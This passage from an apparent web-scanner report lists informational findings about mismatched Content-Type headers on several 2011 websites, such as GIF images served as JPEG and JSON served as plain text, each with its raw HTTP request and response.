28.11. http://advancedvoip.com/images/voip_billing_company_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_company_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_company_p.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1859
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:21 GMT
Accept-Ranges: bytes
ETag: "d62917dee6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:07 GMT
Connection: close

GIF87aQ...w..,....Q....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.8q.9p.9q.9r.:p.;q
...[SNIP]...

28.12. http://advancedvoip.com/images/voip_billing_enterprise_solution.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_enterprise_solution.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_enterprise_solution.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1659
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:20 GMT
Accept-Ranges: bytes
ETag: "8cf842dde6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:06 GMT
Connection: close

GIF87aQ...w..,....Q...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.13. http://advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_enterprise_solution_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_enterprise_solution_p.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1862
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:20 GMT
Accept-Ranges: bytes
ETag: "329640dde6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:07 GMT
Connection: close

GIF87aQ...w..,....Q....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.8q.9p.9q.9r.:p.;q
...[SNIP]...

28.14. http://advancedvoip.com/images/voip_billing_products.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_products.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_products.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1623
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:16 GMT
Accept-Ranges: bytes
ETag: "6229cbdae6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:06 GMT
Connection: close

GIF87aM...w..,....M...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.15. http://advancedvoip.com/images/voip_billing_products_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_products_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_products_p.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1857
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:14 GMT
Accept-Ranges: bytes
ETag: "dae32dae6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:07 GMT
Connection: close

GIF87aM...w..,....M....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.8q.9p.9q.9r.:p.;q
...[SNIP]...

28.16. http://advancedvoip.com/images/voip_billing_provider.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_provider.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_provider.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1502
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:14 GMT
Accept-Ranges: bytes
ETag: "261ffed9e6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:06 GMT
Connection: close

GIF87a:...w..,....:...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.17. http://advancedvoip.com/images/voip_billing_provider_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_provider_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_provider_p.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1705
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:10 GMT
Accept-Ranges: bytes
ETag: "a2ed83d7e6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:07 GMT
Connection: close

GIF87a:...w..,....:....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.9p.9q.9r.:p.;q.:r
...[SNIP]...

28.18. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p63514475&1316238877286 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:55:00 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

28.19. http://attwireless-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://attwireless-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=attwireless&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: attwireless-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:52:42 GMT
Content-Length: 80021


                           baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

28.20. http://aud.pubmatic.com/AdServer/Artemis  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://aud.pubmatic.com
Path:   /AdServer/Artemis

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AdServer/Artemis?dpid=1&segid=D HTTP/1.1
Host: aud.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27330&s=27331&a=23101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:17:13 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 7

success

28.21. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@2@223.3078101@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Sat Sep 17 00:52:10 UTC 2011 -->

28.22. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1191.adx.ne1.yahoo.com compressed/chunked Sat Sep 17 00:53:35 UTC 2011 -->

28.23. http://blekko.com/autocomplete  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /autocomplete?query=ra HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:19 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Cache-Control: max-age=43200
Expires: Sat, 17 Sep 2011 07:44:19 GMT
Vary: Accept-Encoding
X-Blekko-PT: 45fe618b323c2b2dec4cc178ac8a93ba
Content-Length: 224

{"suggestions":["radio shack","radio shack /techblogs","radio shack /gadgets","radio shack /tech","rachel ray","rachel ray /gossip","rachel ray /food","rachel ray /music","ralph lauren","ralph lauren
...[SNIP]...

28.24. http://bostonherald.com/edge/includes/twitter.inc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bostonherald.com
Path:   /edge/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /edge/includes/twitter.inc HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/entertainment/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.24.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.7.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:43:05 GMT
Server: Apache
Last-Modified: Fri, 16 Sep 2011 23:55:07 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 14698
Connection: close


            <!-- twitter_dynamic_content -->
               <p><a class="twitter_name sec_entertainment" href="http://twitter.com/jedgottlieb/" target="_new">Jed's Guestlisted</a>: GIVEAWAY: What's the coolest <a hre
...[SNIP]...

28.25. http://bostonherald.com/news/includes/twitter.inc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bostonherald.com
Path:   /news/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /news/includes/twitter.inc HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.18.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.5.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:31:53 GMT
Server: Apache
Last-Modified: Fri, 16 Sep 2011 23:20:07 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18568
Connection: close


            <!-- twitter_dynamic_content -->
               <p><a class="twitter_name sec_news" href="http://twitter.com/joedwinell/" target="_new">Joe Dwinell</a>: Waltham murder victims all stabbed in neck: <a href
...[SNIP]...

28.26. http://bostonherald.com/projects/payroll_ajax_api.bg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bostonherald.com
Path:   /projects/payroll_ajax_api.bg

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /projects/payroll_ajax_api.bg?src=Mwra&action=get_structure HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/projects/your_tax_dollars.bg?src=Mwra
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.27.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.8.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: application/x-json
Connection: close
Content-Length: 39705

{"form_controls":"<label for=\"payroll_search\">Search:<\/label> <input type=\"text\" name=\"payroll_search\" value=\"\">&nbsp;&nbsp;<select name=\"job_title\" >\n<option selected=\"selected\" value=\
...[SNIP]...

28.27. http://bostonherald.com/track/includes/twitter.inc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bostonherald.com
Path:   /track/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /track/includes/twitter.inc HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
